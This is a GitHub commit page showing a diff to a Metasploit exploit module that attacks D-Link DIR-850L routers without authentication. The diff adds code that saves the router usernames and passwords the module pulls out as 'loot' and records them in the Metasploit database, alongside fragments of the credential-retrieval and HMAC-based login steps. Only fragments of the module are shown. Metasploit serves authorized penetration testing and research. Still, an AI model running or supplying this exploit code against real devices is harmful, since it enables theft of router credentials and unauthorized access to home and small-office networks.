Skip to content

Commit cddec8c

Browse files
author
Austin
authored
download creds, stores in loot.
1 parent 40bcb3f commit cddec8c

File tree

1 file changed

+30
-1
lines changed

1 file changed

+30
-1
lines changed

modules/exploits/linux/http/dlink_850l_unauth_exec.rb

Lines changed: 30 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
1111
include Msf::Exploit::Remote::HttpClient
1212
include Msf::Exploit::Remote::HttpServer
1313
include Msf::Exploit::Remote::EXE
14+
include Msf::Auxiliary::Report
1415
include Msf::Exploit::FileDropper
1516

1617
def initialize(info = {})
@@ -54,6 +55,32 @@ def initialize(info = {})
5455
])
5556
end
5657

58+
def report_cred(opts)
59+
service_data = {
60+
address: opts[:ip],
61+
port: opts[:port],
62+
service_name: opts[:service_name],
63+
protocol: 'tcp',
64+
workspace_id: myworkspace_id
65+
}
66+
67+
credential_data = {
68+
origin_type: :service,
69+
module_fullname: fullname,
70+
username: opts[:user],
71+
private_data: opts[:password],
72+
private_type: :password
73+
}.merge(service_data)
74+
75+
login_data = {
76+
core: create_credential(credential_data),
77+
status: Metasploit::Model::Login::Status::UNTRIED,
78+
proof: opts[:proof]
79+
}.merge(service_data)
80+
81+
create_credential_login(login_data)
82+
end
83+
5784
def retrieve_creds
5885
begin
5986
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
@@ -79,6 +106,8 @@ def retrieve_creds
79106
username = parse.at('//name').text
80107
password = parse.at('//password').text
81108
vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
109+
loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
110+
print_good("#{peer} - Downloaded credentials to #{loot}")
82111
return username, password
83112
rescue ::Rex::ConnectionError
84113
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
@@ -104,7 +133,7 @@ def login(username, password)
104133
uid, challenge = retrieve_uid
105134
begin
106135
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
107-
res = send_request_cgi({
136+
send_request_cgi({
108137
'uri' => '/authentication.cgi',
109138
'method' => 'POST',
110139
'data' => "id=#{username}&password=#{hash}",

0 commit comments

Comments
 (0)